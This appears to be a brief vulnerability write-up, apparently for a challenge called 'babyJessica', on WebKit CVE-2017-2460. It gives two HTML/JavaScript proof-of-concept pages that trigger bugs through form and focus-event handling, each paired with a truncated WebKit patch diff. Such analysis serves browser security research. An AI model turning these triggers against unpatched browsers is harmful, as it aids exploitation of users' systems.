babyJessica

First of all, lets look at CVE-2017-2460. It was reported in 2017-Jan-19. PoC: ================================================================= <script> function go() {   object.name = "foo";   input.autofocus = true;   output.appendChild(input);   form.submit(); } function eventhandler() {   for(var i=0;i<100;i++) {     var e = document.createElement("input");     form.appendChild(e);   } } </script> <body onload=go()> <form id="form"> <object id="object"> <output id="output">a</output> <input id="input" onfocus="eventhandler()"> ================================================================= Patch: @@ -506,7 +506,9 @@ bool HTMLObjectElement::appendFormData(FormDataList& encoding, bool)       if (name().isEmpty())           return false;  -    Widget* widget = pluginWidget();  +   ...

PoC: ================================================================= <script> function go() { input.selectionDirection = "foo"; } var i=0; function eventhandler() { i++; if(i==1) { input.setAttribute("autofocus", "autofocus"); div.appendChild(form); } if(i==2) { input.type = "image/x-unsupported"; } } </script> <body onload=go()> <div id="div"> <form id="form"> <input id="input" onfocus="eventhandler()" type="tel"> ================================================================= diff: ================================================================= - if (event.isMouseEvent() - || event.type() == eventNames().blurEvent - || event.type() == eventNames().focusEvent) - { - element().document().updateStyleIfNeeded(); - - auto* renderer = element().renderer(); - if (element().renderer...